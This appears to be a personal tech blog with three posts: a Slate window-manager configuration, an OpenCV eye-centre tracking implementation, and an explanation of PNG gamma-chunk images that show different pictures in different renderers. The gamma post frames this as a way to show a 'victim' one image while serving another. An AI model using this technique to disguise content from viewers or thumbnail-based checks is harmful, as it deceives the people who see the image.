config defaultToCurrentScreen true
# Shows app icons and background apps, spreads icons in the same place.
config windowHintsShowIcons true
config windowHintsIgnoreHiddenWindows false
config windowHintsSpread true

Window Hints

Along with the general configuration from the previous section, all you have to do to use window hints is bind the hint operation to a key. I like to use command+e as it is easy to type and not used in many Mac applications.

To do this put the following in your .slate file:

bind e:cmd hint ASDFGHJKLQWERTYUIOPCVBN # use whatever keys you want

You can choose which letters you want window hints to use. The letters will be assigned to windows in the order specified by the windowHintsOrder config option. If you have more windows than there are letters specified, some hints will not be shown. I suggest you start with either the home row of your keyboard or all the keys on one side of the keyboard so you only need one hand.

Window Grid

If you are a fan of the Divvy-style window positioning grid, Slate can do that too. To bind the window grid to a key use a command like:

bind g:cmd grid padding:5 0:6,2 1:8,3

This particular command binds command+g to show a 6x2 grid on the first monitor (monitor 0) and an 8x3 grid on the second monitor (monitor 1).

Normal Window Management

Slate is so configurable that it lets you move and resize windows to any fraction of the screen you want; however, this can be annoying if you just want to use halves and fullscreen. To remedy this, Slate allows you to create aliases that you can use for common commands.

Here are some aliases I use for common positions:

# Abstract positions
alias full move screenOriginX;screenOriginY screenSizeX;screenSizeY
alias lefthalf move screenOriginX;screenOriginY screenSizeX/2;screenSizeY
alias righthalf move screenOriginX+screenSizeX/2;screenOriginY screenSizeX/2;screenSizeY
alias topleft corner top-left resize:screenSizeX/2;screenSizeY/2
alias topright corner top-right resize:screenSizeX/2;screenSizeY/2
alias bottomleft corner bottom-left resize:screenSizeX/2;screenSizeY/2
alias bottomright corner bottom-right resize:screenSizeX/2;screenSizeY/2

You can then bind these commands to any keys you want. For example, you can use the numpad to move windows around:

# Numpad location Bindings
bind pad1 ${bottomleft}
bind pad2 push bottom bar-resize:screenSizeY/2
bind pad3 ${bottomright}
bind pad4 ${lefthalf}
bind pad5 ${full}
bind pad6 ${righthalf}
bind pad7 ${topleft}
bind pad8 push top bar-resize:screenSizeY/2
bind pad9 ${topright}

Layouts

Layouts allow you to tell Slate how you like your windows arranged so it can arrange them for you. To create a layout you have to specify how you like your applications arranged and then you bind the layout to a keyboard shortcut.

We can re-use the aliases from the last section in our layout definitions like this:

layout 1monitor 'iTerm':REPEAT ${bottomright}
layout 1monitor 'Sublime Text 2':REPEAT ${lefthalf}
layout 1monitor 'MacVim':REPEAT ${lefthalf}
layout 1monitor 'Safari':REPEAT ${righthalf}
layout 1monitor 'Mail':REPEAT ${righthalf}
layout 1monitor 'Path Finder':REPEAT ${topright}
layout 1monitor 'Xcode':REPEAT ${full}
layout 1monitor 'Eclipse':REPEAT ${full}
layout 1monitor 'iTunes':REPEAT ${full}

Then we can bind the layout to a key like this:

bind l:cmd layout 1monitor

Now whenever we press command+l our apps will arrange themselves the way we like. In this example I named my layout 1monitor but you can give it a meaningful name and even have multiple layouts with different names.

Ultra-Fast App Switching

To bind shortcuts directly to focusing an app you can use the focus command. For example, we can bind command+option+b to focus our browser:

bind b:cmd;alt focus 'Google Chrome'

My .slate

Here is my .slate file in its entirety. Do note that it is optimized for the Dvorak keyboard layout, so some of the shortcuts may seem weird and the hint keys are the Dvorak home row rather than QWERTY.

Magic PNG Thumbnails

2012-11-14T00:00:00+00:00

I was shown a trick by a friend where an image posted on a website displayed one thing in the thumbnail and another in the lightbox. http://funnyjunk.com/channel/ponytime/rainbow+dash/llhuDyy/15#15

This post contains an explanation of how these images work and how I was able to replicate their behaviour.

The Behaviour

Certain renderers of the png files would display one image and other renderers would display a completely different one. One image is always dark and one is light.

Example:

Things that display the light image:

Thumbnail renderers (Facebook, etc…)
Apple png rendering
Windows png rendering

Things that display the dark image:

Firefox (and by extension anything that uses libpng)
Google Chrome

This can lead to interesting combos:

Linking the image on Facebook can show one image as a thumbnail but a completely different one when the link is clicked.
A picture that detects the user’s browser. (Chrome/Firefox or Safari)
A picture that displays one thing in the browser and a different thing when downloaded to the user’s (victim’s) computer.
The classic image board thumbnail.

The Challenge and Victory

I started on a long journey to figure out how this effect works so that I could replicate it. The path to enlightenment involved many wrong turns including believing that the image was being interpreted as a GIF but I eventually discovered the truth.

After I discovered the secret I wrote a command line tool in Ruby called doubleVision so that anybody could generate magic thumbnail images.

doubleVision is available on Github and as an executable Ruby gem.

The output images look like this:

Try downloading it to your computer and then viewing it. Cool eh?

How it works

The PNG specification contains a metadata attribute that allows you to specify the gamma to render the image with. This attribute is intended to ensure that images look identical on all computers, using a standard image processing technique called gamma correction.

The PNG specification defines the gAMA chunk (the chunk that stores the gamma value) to change the image output like so:

light_out = image_sample^(1 / gamma)

This scales the image values exponentially based on the reciprocal of the gamma value. If the gamma value is around 1, as it normally is, this function has little noticeable effect. During this process, the lowest brightness value for a pixel is 0 and the highest is 1.

If we set the PNG gamma attribute to a very low value, making the exponent value very high (since it is the reciprocal), all darker pixels will be made black and all lighter pixels will be mapped to the normal spectrum.

Exponential Gamma Mapping

We can reverse this mapping for a very low value of the gamma attribute (I use 0.023) to get a PNG image where all the pixels of the image are mapped to very light colors. If we then set the gamma value of the PNG to 0.023 the image will look somewhat normal, except for the rounding errors introduced by crunching the image into high values.
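To make the mapping concrete, here is a minimal Python sketch of the formula above and its inverse. The function names (`decode`, `encode`, `to_byte`) are made up for illustration and are not taken from doubleVision; brightness values are assumed to be floats between 0 and 1.

```python
GAMMA = 0.023  # the very low gAMA value used in this post


def decode(sample, gamma=GAMMA):
    """What a gamma-aware renderer does: light_out = sample ^ (1 / gamma)."""
    return sample ** (1.0 / gamma)


def encode(light, gamma=GAMMA):
    """The reverse mapping: the stored sample that decodes back to `light`."""
    return light ** gamma


def to_byte(value):
    """Quantize a 0..1 brightness to an 8-bit channel value."""
    return round(value * 255)


for light in (0.1, 0.5, 0.9):
    stored = to_byte(encode(light))      # what ends up in the PNG
    recovered = decode(stored / 255)     # what a gamma-aware renderer shows
    print(light, stored, round(recovered, 3))
```

Every encoded value lands near the top of the 8-bit range, which is why the image looks washed out without gamma support, and the small gap between `light` and `recovered` is the rounding error mentioned above.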

The thing is, not all renderers support the gamma attribute. If we try to view this image in a renderer that does not support the gamma attribute, it will appear too bright to make out.

We can abuse this to create a magic thumbnail by taking two images of the same size and creating a new image twice their dimensions. One image is run through the previously mentioned reverse gamma filter that makes all pixels very bright and the other is darkened so that it has no very bright pixels. The images are then spaced out in grids around each other (see image). The resulting image is saved as a PNG file with a gAMA of 0.023.

Pixel Grid Pattern

When the image is displayed in a renderer that supports gamma (like Firefox/Chrome) the light pixels become fairly dark but visible colors and the normal pixels become a grid of dark pixels. When the image is displayed in a renderer that does not support gamma (like Apple/Microsoft rendering) the untransformed image is shown surrounded by a grid of seemingly white pixels.
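The interleaving step can be sketched in a few lines of Python. The exact grid pattern is only shown in the figure, so the layout used here (one pixel of the darkened image in the top-left of every 2x2 cell, with the other three taken from the brightened image) is an assumption for illustration, as is the `interleave` name. Images are represented as plain lists of rows.

```python
def interleave(light_img, dark_img):
    """Combine two equally sized images into one with twice the width and height.

    Assumed layout: in every 2x2 cell the top-left pixel comes from dark_img
    (seen without gamma support) and the other three pixels come from
    light_img (seen with gamma support).
    """
    height, width = len(dark_img), len(dark_img[0])
    out = [[None] * (2 * width) for _ in range(2 * height)]
    for y in range(2 * height):
        for x in range(2 * width):
            source = dark_img if (x % 2 == 0 and y % 2 == 0) else light_img
            out[y][x] = source[y // 2][x // 2]
    return out


light = [[250, 251], [252, 253]]  # already run through the reverse gamma filter
dark = [[10, 20], [30, 40]]       # darkened so it has no very bright pixels
for row in interleave(light, dark):
    print(row)
```

The result would then be saved as a PNG with a gAMA of 0.023, which this sketch leaves out.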

Installation and Usage

You can install the doubleVision gem and command using:

$ gem install doubleVision

Next, run the program like this:

doubleVision withgamma.png withoutgamma.png out.png

obviously replacing the filenames with your own.

It will combine the images into one image (out.png) that will display withgamma.png when viewed with gamma support (e.g. in Firefox) and withoutgamma.png when displayed without gamma support (e.g. as a thumbnail).

For more detailed instructions read the README on Github.

Other Example

Was generated from: and

Simple, accurate eye center tracking in OpenCV

2012-11-04T00:00:00+00:00

I am currently working on writing an open source gaze tracker in OpenCV that requires only a webcam. One of the things necessary for any gaze tracker¹ is accurate tracking of the eye center.

For my gaze tracker I had the following constraints:

Must work on low resolution images.
Must be able to run in real time.
I must be able to implement it with only high school level math knowledge.
Must be accurate enough to be used for gaze tracking.

I came across a paper² by Fabian Timm that details an algorithm that fit all of my criteria. It uses image gradients and dot products to create a function that theoretically is at a maximum at the center of the image’s most prominent circle.

Here is a video he made of his algorithm in action:

Before continuing I recommend that you read his paper.

Implementing the algorithm

After implementing the algorithm detailed in the paper using OpenCV functions my implementation had horrendous accuracy and many problems. These were partially caused by the paper not specifying some important numbers.

These numbers include:

The eye region fractions.
The gradient magnitude threshold.
The size of the eye regions used.

I contacted Dr. Timm and he helped me with some of my problems. Below are some problems that I resolved with Dr. Timm’s help.

Things That Are Not in the Paper

The first thing I fixed was the eye region fractions as portions of the face. From Dr. Timm:

Let (x, y) be the upper left corner and W, H the width and height of the detected face. Then, the mean of the right eye centre is located at (x + 0.3W, y + 0.4H) and the mean of the left centre is at position (x + 0.7W, y + 0.4H).

On his recommendation I also applied a Gaussian blur to the face before processing it to smooth noise. I use a sigma of 0.005 * sideLengthOfFace.
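As a rough sketch of how these numbers turn into code, the Python below computes the expected eye centres and the blur sigma from a detected face rectangle. It assumes the offsets in the quote are fractions of the face width and height, that is (x + 0.3W, y + 0.4H) and (x + 0.7W, y + 0.4H); the function names are hypothetical and not from my tracker.

```python
def eye_centers(x, y, w, h):
    """Return the expected (right_eye, left_eye) centres for a face rectangle.

    (x, y) is the upper-left corner of the face and w, h its width and height.
    Assumes the offsets are fractions of the face size: 0.3W / 0.7W and 0.4H.
    """
    right_eye = (x + 0.3 * w, y + 0.4 * h)
    left_eye = (x + 0.7 * w, y + 0.4 * h)
    return right_eye, left_eye


def blur_sigma(face_side_length):
    """Sigma of the Gaussian blur applied to the face before processing."""
    return 0.005 * face_side_length


right, left = eye_centers(100, 50, 200, 200)
print(right, left, blur_sigma(200))
```

Note that "right" and "left" are from the subject's point of view, so the right eye is on the left side of the image.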

The Gradient Algorithm

One important thing that is not explained very clearly in the paper is the gradient algorithm. In his implementation he uses the MATLAB gradient function. In my original implementation I used a Sobel operator, but by imitating MATLAB’s gradient function I achieved much better results.

The way MATLAB’s gradient algorithm works (in MATLAB code) is [x(2)-x(1) (x(3:end)-x(1:end-2))/2 x(end)-x(end-1)] with x being the input. Translated into C++ and OpenCV this comes out as:

cv::Mat computeMatXGradient(const cv::Mat &mat) {
  cv::Mat out(mat.rows,mat.cols,CV_64F);

  for (int y = 0; y < mat.rows; ++y) {
    const uchar *Mr = mat.ptr<uchar>(y);
    double *Or = out.ptr<double>(y);

    Or[0] = Mr[1] - Mr[0];
    for (int x = 1; x < mat.cols - 1; ++x) {
      Or[x] = (Mr[x+1] - Mr[x-1])/2.0;
    }
    Or[mat.cols-1] = Mr[mat.cols-1] - Mr[mat.cols-2];
  }

  return out;
}

To get the Y gradient I simply take the X gradient of the transposed matrix and transpose it again: computeMatXGradient(eyeROI.t()).t()

By replicating his gradient algorithm I was also able to use the same gradient threshold as him. From Dr. Timm:

I remove all gradients that are below this threshold:

0.3 * stdMagnGrad + meanMagnGrad

where “stdMagnGrad” and “meanMagnGrad” are the standard deviation and the mean of all gradient magnitudes, i.e. the length of the gradients.
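The threshold is straightforward to compute. Here is a minimal Python sketch, assuming the X and Y gradients are given as flat lists of equal length and using the population standard deviation (whether the original uses the population or sample form is not stated, so that choice is an assumption). The function names are hypothetical.

```python
import math
import statistics


def gradient_threshold(grad_x, grad_y, std_factor=0.3):
    """Return (threshold, magnitudes) where threshold = 0.3 * std + mean."""
    magnitudes = [math.hypot(gx, gy) for gx, gy in zip(grad_x, grad_y)]
    mean = statistics.mean(magnitudes)
    std = statistics.pstdev(magnitudes)  # population standard deviation (assumed)
    return std_factor * std + mean, magnitudes


def keep_strong_gradients(grad_x, grad_y):
    """Drop every gradient whose magnitude is below the threshold."""
    threshold, magnitudes = gradient_threshold(grad_x, grad_y)
    return [
        (gx, gy)
        for gx, gy, magnitude in zip(grad_x, grad_y, magnitudes)
        if magnitude >= threshold
    ]


print(keep_strong_gradients([3.0, 0.0, 0.0, 0.0], [4.0, 0.0, 0.0, 0.0]))
```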

The “Little Thing” that he didn’t mention

Because his algorithm in the form he gives in the paper is generalized to all circles, he left out one tiny but important thing. For me this one line of code made the difference between it working and being terribly inaccurate.

In the equation he gives, the dot product of the d vector and the gradient is taken and then squared. The thing is, this makes negative dot products positive.

Dot products are negative if the vectors are pointing in opposite directions. The gradient function used creates vectors that always point towards the lighter region. Since the iris is darker than the sclera (white part), the vectors of the iris edge always point out. This means that at the center they will be facing in the same direction as the d vector. Anything pointing in the opposite direction is irrelevant.

To fix this I added a line of code that turns negative values into zero so they have no effect on the result: dotProduct = std::max(0.0,dotProduct);

After adding this line of code my implementation tracked my eyes excellently and worked exactly as it should.
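To show where the clamp sits, here is a small pure-Python sketch of the scoring step with a synthetic test. It is not my OpenCV implementation: `center_score` and `synthetic_iris` are names made up for this example, the gradients are assumed to already be unit length, and the "iris" is just a ring of points whose gradients point outward.

```python
import math


def center_score(cx, cy, samples):
    """Mean of max(0, d . g)^2 over all (x, y, gx, gy) gradient samples.

    d is the unit vector from the candidate centre (cx, cy) to the sample.
    """
    total = 0.0
    for x, y, gx, gy in samples:
        dx, dy = x - cx, y - cy
        length = math.hypot(dx, dy)
        if length == 0:
            continue  # the candidate sits exactly on this sample
        dot = (dx * gx + dy * gy) / length
        dot = max(0.0, dot)  # the extra line: ignore gradients pointing inward
        total += dot * dot
    return total / len(samples)


def synthetic_iris(cx, cy, radius, count=16):
    """Edge samples of a dark disc: unit gradients point outward to the light."""
    samples = []
    for i in range(count):
        angle = 2 * math.pi * i / count
        ux, uy = math.cos(angle), math.sin(angle)
        samples.append((cx + radius * ux, cy + radius * uy, ux, uy))
    return samples


samples = synthetic_iris(5, 5, 3)
candidates = [(x, y) for x in range(11) for y in range(11)]
best = max(candidates, key=lambda c: center_score(c[0], c[1], samples))
print(best)
```

On this synthetic ring the true centre gets the highest score, because every d vector lines up with its gradient there. Without the clamp, gradients pointing toward the candidate would also contribute after squaring, which is what hurt accuracy on real eye images.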

Conclusion

Dr. Timm’s eye center location algorithm is an excellent simple way to track the pupil, but only if you add a few extra things that he does not talk about in his paper.

In terms of my eye tracker at the moment this is all I have implemented. I am still looking into methods of tracking a reference point like eye corner to accurately judge where the user is looking.

I am also looking into using deformation of the eye into an oval to determine the orientation of the iris.

An eye tracker gives the pixel position of the center of the pupil in an image whereas a gaze tracker determines where the person is looking on the screen. ↩
Timm and Barth. Accurate eye centre localisation by means of gradients. In Proceedings of the Int. Conference on Computer Vision Theory and Applications (VISAPP), volume 1, pages 125-130, Algarve, Portugal, 2011. INSTICC. ↩
